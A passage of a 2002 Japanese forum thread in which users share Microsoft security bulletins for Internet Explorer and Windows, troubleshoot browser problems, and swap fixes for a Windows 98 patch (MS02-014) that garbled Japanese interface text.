320 :313です:02/03/05 21:41
メモリーは足りてるんです。
317さん 318さん ありがとう。
316059いれてみます。

321 :cheshire-cat:02/03/05 21:53
早く、IE6SP1を・・・・泣

322 :名無しさん@お腹いっぱい。:02/03/05 23:19
最近IE6が、よく故障するのですよ。
修復するけど、故障の原因ってなんでしょうね?

323 :名無しさん@お腹いっぱい。:02/03/05 23:24
>>319
俺はバージョンアップした
英語版しかないらしい

324 :名無しさん@お腹いっぱい。:02/03/05 23:34
MSXML4.0の日本語版
http://www.microsoft.com/downloads/release.asp?releaseid=33910
のmsxmlJPN.msi - 4,972 Kb
MSXML 4.0 RTM 日本語版のダウンロードでは 3 つのオプションがあります。
http://www.microsoft.com/japan/developer/xml/downloads/msxml4.asp


325 :名無しさん@お腹いっぱい。:02/03/05 23:57
Microsoft Windows 2000 Service Pack 3
はよ出さんかい

326 :名無しさん@お腹いっぱい。:02/03/06 00:35
>>321
毎月のように発見される脆弱性と
その対処に追われてサービスパックどころじゃないでしょ。

327 :名無しさん@お腹いっぱい。:02/03/06 00:41
>>323
日本語版
ttp://microsoft.com/japan/enable/products/security/proglist.asp?prod=032&info=13


328 :名無しさん@お腹いっぱい。:02/03/06 01:45
IE5.5SP2にしたけど修正プログラムって何いれればいいの?

329 :名無しさん@お腹いっぱい。:02/03/06 01:59
>>328
そりゃもちろんネギ

330 :名無しさん@お腹いっぱい。:02/03/06 02:05
IE5.01SP3を出してくれないかなー。
防御しようのない穴があるのにそのパッチが出てないなんて
精神衛生上悪いよ。

ゲイツは日本に来てる暇があったら徹夜でプログラム考えろ。

331 :名無しさん@お腹いっぱい。:02/03/06 03:49
こんにちは。使用OSは、Win98(SP1?)です。
IE6を使っていて、最新のパッチ入れてからだと思うんですが
あるサイトのBBSへの書きこみの際エラーが出たり、
Amazon.co.jpで届け先と請求先の変更と登録が出来ません。

ちゃんとamazonアカウントサービスにもログイン出来ますし、
cookieは完璧有効にしてあるので、買い物かごも正常に動いています。

SSLも機能してます。メールアドレスやパスワードの変更は余裕ですし
届け先と請求先の削除は何故か出来ます。なのに、登録と変更だけが出来ません。

そんなわけで、今日発売の小野リサのベスト盤が買えません(T_T)
これは、やはりX箱のせいですか?それとも、無能な私のせいでしょうか?

332 :名無しさん@お腹いっぱい。:02/03/06 05:01
>>330 ゲイツはプログラム組まんだろ、
もう年だしとてもそんな能力はない。
彼の仕事は、デカイ液晶プロジェクト画面に
自分のニヤケ顔を映すことだよ。

333 :名無しさん@お腹いっぱい。:02/03/06 08:21
http://microsoft.com/japan/technet/security/current.asp?url=
/japan/technet/security/frame_prekb.asp?sec_cd=MS02-013

334 :名無しさん@お腹いっぱい。:02/03/06 10:05
なんだか急に最近IE+CuamでのWeb閲覧・http DLの速度が
遅くなってきました。たとえばグーグルとかの軽いページでも
表示するのに10秒以上、大体20秒前後かかります。
前はけっこう一瞬だったような気がするのですが。
接続環境はADSL 1.5Mです。実効速度も1.3M出ています。
つか、他のブラウザ、たとえばOpera だともう2秒くらいです。
関係あるのか無いのかわかりませんがNN6でも遅いです。

IE Version: 6.0.2600.0000
更新バージョン: Q313675; Q316059

OS W2K 5.00.2195 SP2

です。同じような症状の方いらっしゃいますか?

335 :名無しさん@お腹いっぱい。 :02/03/06 10:08
>>334
SRP1は?(プ

キャッシュ消したら〜?

336 :名無しさん@お腹いっぱい。:02/03/06 10:14
>335
あ、書き忘れましたがそれも当てました。
キャッシュも消しました。クッキーも。

337 :名無しさん@お腹いっぱい。:02/03/06 10:31
やっぱり異常な事態なのですね。うーむ。

338 :IEの最新パッチ:02/03/06 11:11
2002 年 2 月 11 日 Internet Explorer の累積的な修正プログラム (MS02-005)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-005

XMLHTTP コントロールにより、ローカル ファイルにアクセスすることができる (MS02-008)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-008

Internet Explorer の不正な VBScript 処理により Web ページがローカル ファイルを読み取る (MS02-009)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-009

>>307 Java アプレットがブラウザ トラフィックをリダイレクトする(MS02-013)
http://www.microsoft.com/japan/technet/security/bulletin/ms02-013ov.asp
参考記事として
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020305/1/ を追加しておきます。

339 :名無しさん@お腹いっぱい。:02/03/06 11:38
MSXML4.0(msxmlJPN.msi)をインストールしようとしたら、windows installerの
新しいヴァージョンでないとインストール出来ませんって出た。
windows installerに新しいヴァージョンなんてあるの?

340 :名無しさん@お腹いっぱい。:02/03/06 12:09
昨日から、IEを開こうとすると、
一応アドレス先にはアクセスしてるようなのですが
表示するまえに
「問題が発生したため、microsoft internet explorer を終了します。
ご不便をおかけして申し訳ありません。」
というウィンドウが出てきて、web観覧が出来ません。
エラー報告を送信して、ブラウザの再起動をしても直りません・・・
そこで、ネスケをインストールしてみましたが
同じようなエラーが出てダメです。

IEの再インストール、OS再インストールしてもダメ

どうすればいいでしょうか?
ほんとよろしくお願いします。

環境は、winme IE6 です

341 :名無しさん@お腹いっぱい。:02/03/06 12:14
>>340
WinMeだったらOS再インストールの前にシステムの復元を試してみるべきでしたね。
しかし、OS再インストールでもダメ?クリーンインストールした?

342 :340:02/03/06 12:30
>>341
再インストールのまえに、システムの復元もしてみたけど同じでした。
クリーンインストールじゃなくて、ただの再インストールっす。
出来れば、クリーンインストールしたくないっす・・あぁ

343 :名無しさん@お腹いっぱい。:02/03/06 13:26
>>334です。試しに今LANで繋いでる他のマシンからアクセスしたら
やはり全然速いです。ただそのマシンはIE5.01です。
もしかしてIE6の方が表示が遅いとか、そういうことって・・・
無いですかやっぱり。

344 :名無しさん@お腹いっぱい。:02/03/06 13:34
なんでWin2000だけHotFixが必要でMeやXPは普通のでいいん?

345 :名無しさん@お腹いっぱい。:02/03/06 13:35
CPUとかメモリによるし、インストールしている他のアプリケーションなど
も関係してくる。ぎりぎりの状態ならIE5.01とIE6.0のちょっとの差が影響
することもある。基本的には、常駐ソフト見直す、デスクトップにショート
カットを不必要に置かない、メモリを増やすなどで解消。古いPenII機でも
IE6はさくさく動く。デフラグもやってみてね。ていうかセキュリティと関
係ないよね。

346 :名無しさん@お腹いっぱい。:02/03/06 13:41
>>345
単に遅いというのならまだいいのですが
もしかして何か変なプログラムが陰で動いていて
そのしわ寄せで・・・とか思ってしまって。

IEだけが・・・というのが不思議です。

347 :名無しさん@お腹いっぱい。:02/03/06 14:06
>>346 パッチ当ててからデフラグやってないだけの話とちゃうんかい

348 :名無しさん@お腹いっぱい。:02/03/06 17:30
>>347
そう言えばデフラグやってませんでした。
で、今やってみました。が、状況は変わりません (ToT)

opera と比較すると10倍以上、いやもっと遅いです。
で、どういうわけかNNだと立ち上げてすぐには
ページがうまく開けません。URL欄に打ち込んで、
4,5回エンターを押して、やっと表示されるかんじです。
でもそうやって表示されはじめてしまえば、軽く
表示してくれます。IEよりは全然速いです。

気持ち悪いです。。

349 :名無しさん@お腹いっぱい。:02/03/06 17:33
>>348 ウィルスチェックはやったの? アンチウィルスソフト持ってなかったら
すぐに買いに行こう。アンチウィルスないといつまでも不安が残るぞ。

350 :名無しさん@お腹いっぱい。:02/03/06 17:48
>>349
NIS2001はあります。完全スキャンやってみるべきですか。

てか、Norton protection update とかいうやつが更新出来ないんで
そのままになってますが・・・。あと、だいぶ前からですけど
完全スキャンをして、ウィルス無し、という結果が出たにも関わらず
メニュー表示が完全スキャンが×印のまま、という不具合が。。

この際NIS2002を買って新規インストールすべきでしょうか?

351 :名無しさん@お腹いっぱい。:02/03/06 17:56
>>350
NIS2001でも金払えばファイル更新できるはず。期限切れなら当然更新できない。
http://www.symantec.com/region/jp/support/virwall/index.html
IEとNNのどっちを既定のブラウザにしてるの?その辺の関係で設定がおかしくなってる可能性がある。

352 :名無しさん@お腹いっぱい。:02/03/06 18:14
>>351
いえ、期限切れではないです。他のウィルス定義とかは
ちゃんとDL出来てますし。なんかバグッぽいかんじで
そのNorton protection updateだけが毎回インストールに
失敗するんです。

で、既定のブラウザはCuamにしてます。
Cuam の設定のとこにCuamをデフォルトのブラウザにする
という項目があったのですが、それではうまくいかないので
手動で強引に html に関連付けしてしまいました。

353 :名無しさん@お腹いっぱい。:02/03/06 18:29
>>352 それじゃあIEの問題ではなさそうですね。関連付けがおかしくなってるのかも。
そんなにブラウザいっぱい入れて不安定なシステムで、一般的にIE6が重いって言っち
ゃあだめよ。セキュリティに関係なさそうなのでこの辺で。

354 :名無しさん@お腹いっぱい。:02/03/06 18:34
じゃウィルススキャンしてOKならとりあえず
セキュリティ的には安心していいのですね。
それならまあ一安心です。
どうもありがとうございました。

355 :IE最新パッチ:02/03/06 21:18
2002 年 2 月 11 日 Internet Explorer の累積的な修正プログラム (MS02-005)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-005

XMLHTTP コントロールにより、ローカル ファイルにアクセスすることができる (MS02-008)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-008

Internet Explorer の不正な VBScript 処理により Web ページがローカル ファイルを読み取る (MS02-009)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-009

>>307 Java アプレットがブラウザ トラフィックをリダイレクトする(MS02-013)
http://www.microsoft.com/japan/technet/security/bulletin/ms02-013ov.asp
参考記事として
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020305/1/ を追加しておきます。

356 :名無しさん@お腹いっぱい。:02/03/06 23:17
IT Proの「IEを使い続けるための“お勧め”設定」って記事…


「1. IE のインターネット・オプションの「セキュリティ設定」において,インター
ネット・ゾーンとイ ントラネット・ゾーンの「ActiveX コントロールとプラグイン」の
項は,すべて無効にする
2. 同様に,「Microsoft VM」と「スクリプト」の項もすべて無効にする
3. IEのインターネット・オプションの「詳細設定」において,「マルチメディア」の
項の「Web ページのアニメーションを再生する」「Web ページのサウンドを再生する」
「Web ページ のビデオを再生する」のチェックをすべて外す

もちろん,現在公開されているIEのセキュリティ・パッチをすべて適用することが
前提条件だ。」


何らかの事情でここまでしてIEを使いつづけなけりゃならない人たちってのは
本当に気の毒だよなあと思った(藁

357 :名無しさん@お腹いっぱい。:02/03/06 23:22
ActiveXやスクリプト関係は別にIEだけが危険なわけじゃないぞ。
他のブラウザでONにしたままエロサイト行ってみろ。

358 :名無しさん@お腹いっぱい。:02/03/07 04:35
>IE5.5SP2にしたけど修正プログラムって何いれればいいの?

Microsoft Windows Updateへいって左上[製品の更新]から右上[ダウンロード]
クリック。
串を使っているなら>355の下から2つ目のをダウンロードしてエクスプローラー
などで実行しよう。


359 :名無しさん@お腹いっぱい。:02/03/07 09:38
ネスケだってまともに使うにはJavaScriptやらCSSやら
ダイナミックフォントやらプラグインやらJavaアプレット
やら全部無効にする必要あるだろ。
そこまでしてネスケにしがみつかなきゃならない人たちってのは
本当に気の毒だね(藁

360 :名無しさん@お腹いっぱい。:02/03/07 16:38
age

361 :名無しさん@お腹いっぱい。:02/03/07 19:52
ネスケやオペラはしがみつく価値なし。

362 :名無しさん@お腹いっぱい。:02/03/07 19:57
NetscapeやSunの「JVM」に「盗み見」のセキュリティホール
■URL
http://home.netscape.com/security/
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/216&type=0&nav=sec.sba
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-013

 米Netscape Communicationsは同社のセキュリティ情報サイトで、
米Sun Microsystemsの「Java Virtual Machine」(JVM)と、
Webブラウザー用の「JVM plug-in」にセキュリティホールが見つかったと警告した。

 これは、米Microsoftが4日に報告したJVMのセキュリティホールと同様の問題で、
攻撃者がJavaアプレットを使って、Webブラウザーとプロキシーサーバーとの通信を盗聴可能になるというもの。
これを悪用して、ユーザー名やパスワードなどの機密情報を盗聴される危険性がある。


363 :名無しさん@お腹いっぱい。:02/03/07 22:10
誰かネスケコンポーネントのタブブラウザ作ってくれないかな。
IEがこのていたらくだから、金払ってもいいからさ。

364 :名無しさん@お腹いっぱい。:02/03/07 23:04
>>363
使ったことないから使い勝手は分からないけどこんなものもある。
Collector − IEとNetscapeをタブ切り替え型Webブラウザーにするソフト
http://www.forest.impress.co.jp/library/collector.html

365 :名無しさん@お腹いっぱい。:02/03/08 00:06
ネスケは知らんがmoziilaはタブサポートしているYO!

366 :名無しさん@お腹いっぱい。:02/03/08 11:09
MS02-008のMicrosoft XML Core Services 2.6と3.0の日本語版修正プログラム
はいつになったら出るんじゃい!
IE6.0SP1も早く出せ!


367 :名無しさん@お腹いっぱい。:02/03/08 13:15
セキュリティ警告のメール、URL以外は?????????????の羅列のがきたよ。


368 :名無しさん@お腹いっぱい。:02/03/08 13:20
>367
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-014ov.asp

IEなどではなく、Windowsのシェルに関するセキュリティホールです。
インターネットに繋ぐだけで危険です。

悪意のあるユーザーが、未チェックのバッファを利用して
任意のプログラムを実行することが可能です。
対策が行われていないシステムがインターネットなどのネットワークを
通じて他のコンピュータと接続している場合、
この問題を利用した悪影響を受けることがあります。
この攻撃は、ハッカーまたはクラッカーと呼ばれる悪意のあるユーザーや、
ワームといった自動的な攻撃を目的とした悪意のあるプログラムから
行われることがあります。
上記の攻撃を受けることにより以下のような実害を受ける可能性があります。

* 新しいソフトウェアのインストール (通常は悪意のあるプログラム)
* ハードディスクのフォーマット
* 他のシステムを攻撃するための利用
* Windows の異常停止


369 :名無しさん@お腹いっぱい。:02/03/08 13:26
>368
ルータやProxy経由なら大丈夫か?

370 :ん?:02/03/08 14:48
注意:この修正プログラムは、Internet Explorer 4.0 の アクティブデスクトップを利用している方のみ適用してください。

371 :名無しさん@お腹いっぱい。:02/03/08 14:59
>>370
>Windows NT 4.0(アクティブデスクトップを使用していない環境用)、
>Windows 98 および Windows 98 Second Edition の
>日本語版修正モジュールは、現在準備中です。
>準備ができ次第、このページにて、お知らせします。
準備できてないだけ

372 :名無しさん@お腹いっぱい。:02/03/08 16:34
>対策が行われていないシステムがインターネットなどのネットワークを通じて他の
>コンピュータと接続している場合、この問題を利用した悪影響を受けることがあり
>ます。

んん? これってWindows使っててネットにつなぐだけでやばいってことじゃあないの?
超特大のセキュリティホール?

373 :名無しさん@お腹いっぱい。:02/03/08 16:47
アナばっかだな、どんだけパッチを入れればいいんだよ

374 :名無しさん@お腹いっぱい。:02/03/08 16:59
対策って?
ポートを閉じてればOK?

375 : :02/03/08 18:09
ネスケ他のブラウザだって狙われればIE以上にゴロゴロと穴が見つかる。

376 :名無しさん@お腹いっぱい。:02/03/08 18:36
そうかしら?




とか言ってみるテスト

377 :名無しさん@お腹いっぱい。:02/03/08 18:37
google ヒット件数
ブラウザ名を明示するため予め"web"+"browser"付加、
前者は"vulnerability"後者は"remote"+"exploit"
Netscape Navigator 約4810+約3910
Netscape Comunicator 約3500+約2150
Mozilla 約2840+約1700
Mosaic 約947+約1770
w3m 約320+約186
Opera 約2800+約1890
Internet Explorer 約16200+約8360

378 :訂正:02/03/08 18:39
Netscape Comunicator ×
Netscape Communicator ○

379 : :02/03/08 18:42
そもそもマイクロソフトのプログラマが欠陥ばかりつくるタコだとは思えない








と言ってみるてすと








…ていうか、「IE=欠陥ブラウザという認識は大きな間違い」てのが常識ですが。








と、今さら正論かましてみるてすとのてすと

380 :名無しさん@お腹いっぱい:02/03/08 18:43
IEはジャイアンツのようなもんですな

381 :名無しさん@お腹いっぱい。:02/03/08 20:01
IEなどではなく、Windowsのシェルに関するセキュリティホールです。
インターネットに繋ぐだけで危険です。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-014ov.asp

Microsoft Windows 98 が出た!!
http://download.microsoft.com/download/ie4095/actdesk/4.01_sp2/W9XNT4/JA/q313829.exe

382 :名無しさん@お腹いっぱい。:02/03/08 20:58
>>381
Win98なんだけどパッチ当てたら、
ディスクのプロパティで文字化けするようになったよ。
べつにいいけどね。

なんか糞を握らされた気分。



383 :名無しさん@お腹いっぱい。:02/03/08 21:30
Meは大丈夫なの?

384 :名無しさん@お腹いっぱい。:02/03/08 23:23
>>382

あああ!!!ほんとだぁーー!!!
マジやばいっす!!!

385 :名無しさん@お腹いっぱい。:02/03/08 23:36
>>382
うーむ。試しに弟のパソでやったら凄いことになった。自分のに当てるのは
ちょっとやめとこう。

後は、気づかれないうちに、明日実家から引き上げることを考えるか…。

386 :名無しさん@お腹いっぱい。:02/03/08 23:43
>385
ひでえなオイ!

387 :名無しさん@お腹いっぱい。:02/03/08 23:52
日本語の詳細情報がまだ出ていないので、英語版を見てみた。
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms02-014.asp

今のところ問題があるのはWindows 98, 98SE, Windows NT 4.0, Windows 2000で、
Windows MeとWindows XPにはこの問題はないそうだ。

388 :382:02/03/08 23:58
「ファイル名を指定して実行」も文字化けしてるよ(w
文字化けだけで済んでくれたらいいけど。

くっそー、人柱になっちまった!!

389 :名無しさん@お腹いっぱい。:02/03/09 00:19
今初めてMeであることに感謝した

390 :名無しさん@お腹いっぱい。:02/03/09 00:33
âge

391 :名無しさん@お腹いっぱい。:02/03/09 00:33
とりあえずMS02-014の新しい修正パッチが出るまで見送りだな。

392 :名無しさん@お腹いっぱい。:02/03/09 01:55
02-014パッチ出たよ

393 :名無しさん@お腹いっぱい:02/03/09 02:00
>>385はある種、勇者だな

394 :名無しさん@お腹いっぱい。:02/03/09 02:06
日本語でも詳細情報が出てる。
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-014
「Windows Shell の未チェックのバッファにより、コードが実行される」 (MS02-014)

パッチの不具合のことは書いてない。

395 :名無しさん@お腹いっぱい。:02/03/09 02:37
IEなどという、明日無きブラウザを期待している皆さんも
そうでもない皆さんも
たまには、息抜きで善行でもどうですか?

2ちゃんねらーの力で子供達を救おうよ(連日連夜 祭り開催中!)
何処の板から来たかを明記してくれると、みんなのやる気が上がります!
【クリック】 押してみっかな【クリック】
http://live.2ch.net/test/read.cgi/festival/1015502074/l50
これを見て少しでも協力する気になった人
この文を色々な板にコピペしてくれると助かります

396 :名無しさん@お腹いっぱい。:02/03/09 02:44
顔も知らないどこかの誰かを助けることよりも自分のパソコン守ることの
ほうが大切…








…とか言ってみるドメスト。

397 :名無しさん@お腹いっぱい。:02/03/09 02:49
>IEなどという、明日無きブラウザを期待している皆さんも

違うエンジンのブラウザって、ネスケ、もじら、オペラくらいしか
知らない。どれ使ってるの〜?
もうIEやめよっかなと思ってる…。

398 :名無しさん@お腹いっぱい。:02/03/09 04:03
[ファイル名を指定して実行]も文字化(;_;)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-014
http://download.microsoft.com/download/ie4095/actdesk/4.01_sp2/W9XNT4/JA/q313829.exe

399 :名無しさん@お腹いっぱい。:02/03/09 04:10
不具合を解消する為のパッチなのに
パッチを当てたら 文字化けという不具合が生まれちまったじゃねえかよ ヽ(`Д´)ノ
きちんと 日本語版パッチを当てたら元に戻るんだろうな!

つーか 英語版パッチでも 
一応、穴は埋まった事になるのか?

400 :名無しさん@お腹いっぱい。:02/03/09 05:00
MD5やCRCチェックで弾かれる、普通

401 :名無しさん@お腹いっぱい。:02/03/09 06:34
うぁ〜 なんだこの文字化け..............

このスレ読むまで気づかなかった 鬱

402 :名無しさん@お腹いっぱい。:02/03/09 10:45
やぱりそうか・・
文字化けしてるよな
テメー ふざけんな! なんとかせんかい!
ったく 役所以下のデクノボー集団がよ

403 :名無しさん@お腹いっぱい。:02/03/09 12:03
アフォがいるな

404 :名無しさん@お腹いっぱい。:02/03/09 20:48
MS02-014のパッチを当てても文字化けしてない人はいる?
(XP,Meは除く)

405 :名無しさん@お腹いっぱい。:02/03/09 21:55
知らずにパッチをあてて見事に文字化けしてしまいました。(win98)
誰か文字化けを直す方法を教えてください。
日本語版のパッチを上からあてればよいのでせうか?

悲しいです。


406 :名無しさん@お腹いっぱい。:02/03/09 21:59
パッチを当てられたアプリを洗い出してオリジナルを上書きだろうな
で、またパッチを当てる

ふっ、ごくろうさん

407 :名無しさん@お腹いっぱい。:02/03/09 22:10
>>404
win98だけど、ぜんぜん化けないよ。

408 :名無しさん@お腹いっぱい。:02/03/09 22:17
文字バケスレ立ててもうた

409 :名無し:02/03/09 22:38
(1) Windows\Option\Cabs の中の Win98_xx.cab (xx は Windows 98,
Windows 98 SE ともに 50 のあたりと思われる)から Shell32.dll
を抽出する。

(2) Dos モードにして Windows\System ディレクトリの同名ファイルに
上書きする。

文字化けは以上で直ります。


410 : :02/03/09 22:39
>>408
勇者だな

411 :407:02/03/09 22:39
すまん。やっぱり化けていた!

412 :名無しさん@お腹いっぱい。:02/03/09 22:42
>>409
サンキュ
cab内探すのってめんどいやね

413 :名無しさん@お腹いっぱい。:02/03/09 22:48
あ〜あ 先にこのスレ見ときゃDLしなかったのに・・
ところであの極悪欠陥商品販売会社はウンとかスンとか言わないのか?
DLしてるけど気付いてない人結構多いと思うよ

414 :名無しさん@お腹いっぱい。:02/03/09 23:17
入れるのは止めとくか、しかし何だかなぁ本末転倒だな。

415 :名無しさん@お腹いっぱい。:02/03/09 23:57
M$からダウンロードする場合
誰かが人柱になってからだな
出たらすぐに当てるという条件反射はいかん
M$とyahooは信用できん 飛び付くとエライ目に合う
これ定説

416 :名無しさん@お腹いっぱい。:02/03/10 00:36
でも、今回はバグの内容が内容だけに、入れた方がいいかと。
俺もすぐに突っ込んで激しく後悔したくちだが。

417 :385:02/03/10 00:57
>>409
サンクス。これでとりあえず弟のマシンは直した(逃走失敗で捕まっていた)。
でも、これだとパッチが当たってない状態に戻ったってことかな。IEのバージョン
情報を見ると、パッチが当たっていることになってるけど、信用できんな。

ところで、日本語の説明ページの

>既定では、この脆弱性はリモートで利用することはできません。
>しかし、非常に特別な状況下では、Web ページを介してこの脆弱性を
>利用することができる可能性があります。具体的には、ユーザーが
>カスタム URL ハンドラがあるアプリケーションをインストールし、
>次にアンインストールし、さらにアプリケーションのアンインストール
>ルーチンが正常にアプリケーションを完全に削除しなかった場合、
>攻撃者はバッファのオーバーランを発生させようとする HTML Web
>ページを作成し、攻撃を仕掛けようとする可能性があります。

を見ると、何か凄く特異な例って気がするが、このカスタム URL ハンドラ
があるアプリケーションってどんなのかね?やっぱり問題あるのはMS製品
かな?OutlookExpとか。

418 :名無しさん@お腹いっぱい。:02/03/10 00:58
windows2000sp2 IE5.5sp2 Q316059 に
問題のQ313829_W2K_SP3_X86_JA.exe
を当てたけど特に問題ないよ?

見方が悪いのかな?どこを見れば一番わかるの?


419 :名無しさん@お腹いっぱい。:02/03/10 01:06
>>418
いや、ここで騒いでるのは、Win98での不具合と思われ。マイコンピュータで
適当なドライブのプロパティを表示して何もなってなければ問題ないんじゃ
ないかな?

420 :名無しさん@お腹いっぱい。:02/03/10 01:12
なんか、のーてんきなヤツが、
のほほーんしてるのが、
いいのかな?っと。

こっちは、はぎしりモードだけんどもよぉゴルァ>M$

421 :非常に危険度が高いセキュリティ・ホールです:02/03/10 01:45
Windows Shell の未チェックのバッファにより、コードが実行される (MS02-014)
(2002年3月8日: 日本語情報、及び殆どのパッチ公開、最大深刻度 : 中)

*悪意のある攻撃者から、未チェックのバッファを利用して任意のプログラムを
実行される可能性があるという、非常に危険度が高いセキュリティ・ホールです。
決して、マイクロソフトの記述のように「最大深刻度 : 中」ではありません。


422 :名無しさん@お腹いっぱい。:02/03/10 03:00
M$から文字化けについての公式発表まだだよね?

423 :名無しさん@お腹いっぱい。:02/03/10 05:42
>>419
「ドライブのプロパティ」+「ショートカットのプロパティ」+「ファイル名を指定して実行」

424 : ◆mxEmG1yc :02/03/10 06:18


425 :名無しさん@お腹いっぱい。:02/03/10 10:39
この問題って、これまでで最大の潜在的危険を伴っているんでは?!

426 :cheshire-cat:02/03/10 12:10
>>425
Win2000とWin98じゃなければ、問題ないようだけど。

漏れ的にはフシアナトラップの方が痛かった。
あれは何度も泣いた。

427 :425:02/03/10 12:35
>>426
まさにWin2Kだからねぇ・・・


428 :cheshire-cat:02/03/10 12:47
>>427
SP3のベータがテスト中だと聞いたけど。
またデビューは遠くなったね。

429 :名無しさん:02/03/10 17:54
うがー、化けちまった…日本語に直すパッチ出せ<MS>本末転倒だ…(T-T)

430 :名無しさん@お腹いっぱい。:02/03/10 18:13
>>429
お前は>>409を読んだんかと問いたい、問い掛けたい、小一時間ほど問い掛けたい

431 :名無しさん@お腹いっぱい。:02/03/10 18:51
今さっき入れたwin2k。

432 :名無しさん:02/03/10 23:49
>>409
そんなめんどくさい事をしなくても
システムファイルチェッカー(sfc)でShell32.dllを抽出して再起動。
これで一発。

433 :名無しさん@お腹いっぱい。:02/03/11 02:50
入れたらところどころ英語になっちまった

434 :名無しさん@お腹いっぱい。:02/03/11 03:02
>>433
仕様だそうです。


435 :名無しさん@お腹いっぱい。:02/03/11 09:30
>>433
マジっすか?

436 :名無しさん@お腹いっぱい。:02/03/11 10:12
NTなんだけど、「名前を指定して実行」に別のメモリ領域で実行するチェック
ボックスがあったのが"Run in..."と英語になってる
ファイルのプロパティで「全般」が"General"で表示が全部英語になったけど
なんで「バイト」だけそのままなんだろう
ディレクトリのプロパティは「圧縮」がCompressに変わって、ドライブのは
「全般」に出るチェックボックスが"Compress C:\"というようになってる
「ツール」のタブは名前が変わってないけどチェックディスク、バックアップ、
デフラグの説明が英語に変わってる。でもボタンは日本語のまま
フォントもばらばら
これの修正版が出るとしたらq313829から番号が上がるんだろうか。だとしたら
IEの「更新バージョン」がまた増えちまうよ

437 :名無しさん@お腹いっぱい。:02/03/11 11:24
Meでよかった

438 :名無しさん@お腹いっぱい。:02/03/11 11:50
えーちょっと待った
なんかよくわからんけどこれって2Kは関係無いよね?
当てたけど別に化けたりしてないぞう

439 :名無しさん@お腹いっぱい。:02/03/11 11:52
98だと化けるらしい

440 :名無しさん@お腹いっぱい。:02/03/11 12:38
>>436
Win2kでは大丈夫みたい。

441 :名無しさん@お腹いっぱい。:02/03/11 12:46
win2kで入れてみたけど、全然問題なし。

442 :名無しさん@お腹いっぱい。:02/03/11 13:51
やっぱ2Kなら問題無いのか よかった・・・

つかもうIEには愛想がつきた・・・
もじらにします 長い間ありがとうございました どうか探さないで下さい

443 :名無しさん@お腹いっぱい。:02/03/11 14:11
>442
今回のはIEのホールではありません。
決別したかったら、Windowsからどーぞ。


444 :名無しさん@お腹いっぱい。:02/03/11 15:48
442はおもろいやつやな

445 :名無しさん@お腹いっぱい。:02/03/11 16:40
>>444
多分、問題が何なのかもあまり分かっていないんだと思われ(藁

ネタなのかもね。

446 :名無しさん@お腹いっぱい。:02/03/11 16:57
OSME IE6です、インストするとエラーが出てアップデート出来ません。
串もファイヤウォールも、切ってあります。
原因はなんでしょうか?
  ↓
セキュリティ問題の修正プログラム - 2002 年 2 月 14 日 (Internet Explorer 6)
309 KB/ ダウンロード所要時間: < 1 分
この修正プログラムによって、Windows Millennium Edition (以下、Windows Me)、
Windows 98、および Windows NTR 4.0 の Internet Explorer 6 に存在する「Internet Explorer
での不正な VBScript の処理によって、Web ページからローカル ファイルを読み取ることができる」脆弱性 (セキュリティ情報 MS02-009) が修正されます
。 今すぐダウンロードして、悪意のあるユーザーが不正な Web サイトを悪用して、ローカル コンピュータのファイルの内容を読み取ることができないようにしてください。
最初にお読みください

447 :名無しさん@お腹いっぱい。:02/03/11 18:33
>446
WindowsInstallerのバージョンが古いのかも


448 :名無しさん@お腹いっぱい。:02/03/11 19:18
MS02-014に関してwinNT4.0(ie4.0アクティブデスクトップ利用向け)用のパッチとwin98のパッチが同じダウンロード先なんですが、98が文字化けするのはこのせいですかね。

449 :名無しさん@お腹いっぱい。:02/03/11 19:49
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-014
は、一時的にページにアクセスできなくなっていますが、
http://www.microsoft.com/japan/technet/security/bulletin/ms02-014ov.asp
は、まだ生きてるようです(パッチ)。

450 :おくづみ公一:02/03/11 20:03
450

451 :名無しさん@お腹いっぱい。:02/03/11 21:32
パッチインストールしないで、被害に有った人はいますか?
居ない様な気がする。

452 :名無しさん@お腹いっぱい。:02/03/11 21:40
>>451
ここにいる奴のほとんどは技術的な説明を読んでないアフォばかりだろ?
ほっとけよ。

453 : :02/03/11 21:46
>>451
被害にあってからじゃ遅い


454 :cheshire-cat:02/03/11 21:46
>>448
Win2kで文字化けが起こらないのがなぜか、今更気付いた。

455 :名無しさん@お腹いっぱい。:02/03/12 00:27
>>445
アンタ詳しい人と見た!

456 :名無しさん@お腹いっぱい。:02/03/12 00:55
窓の杜の記事が書き直されてる

457 : :02/03/12 01:08
>>455=>>445
ていうか自作自演と見た!

458 :名無しさん@お腹いっぱい。:02/03/12 01:16
インターネットオプションのページでマイコンピュータが表示されないと
危険らしいのですが、うちでは表示されません。どうすれば表示されますか?

459 :名無しさん@お腹いっぱい。:02/03/12 01:32
>>458
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\flags
の値を32引いたものにする。
俺のマシンは1


460 :名無しさん@お腹いっぱい。:02/03/12 01:36
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-014
復帰。ただし、
>* Windows NT 98/98 Second Edition 用の修正プログラムに関しましては
>現在ダウンロードを停止しております。準備ができ次第、このページにて、
>お知らせします。
との事。要するに、文字化けバグ直し中ってことかな?


461 :名無しさん@お腹いっぱい。:02/03/12 02:02
>>459
サンキュ

462 :非常に危険度が高いセキュリティ・ホールです:02/03/12 02:46
Windows Shell の未チェックのバッファにより、コードが実行される (MS02-014)
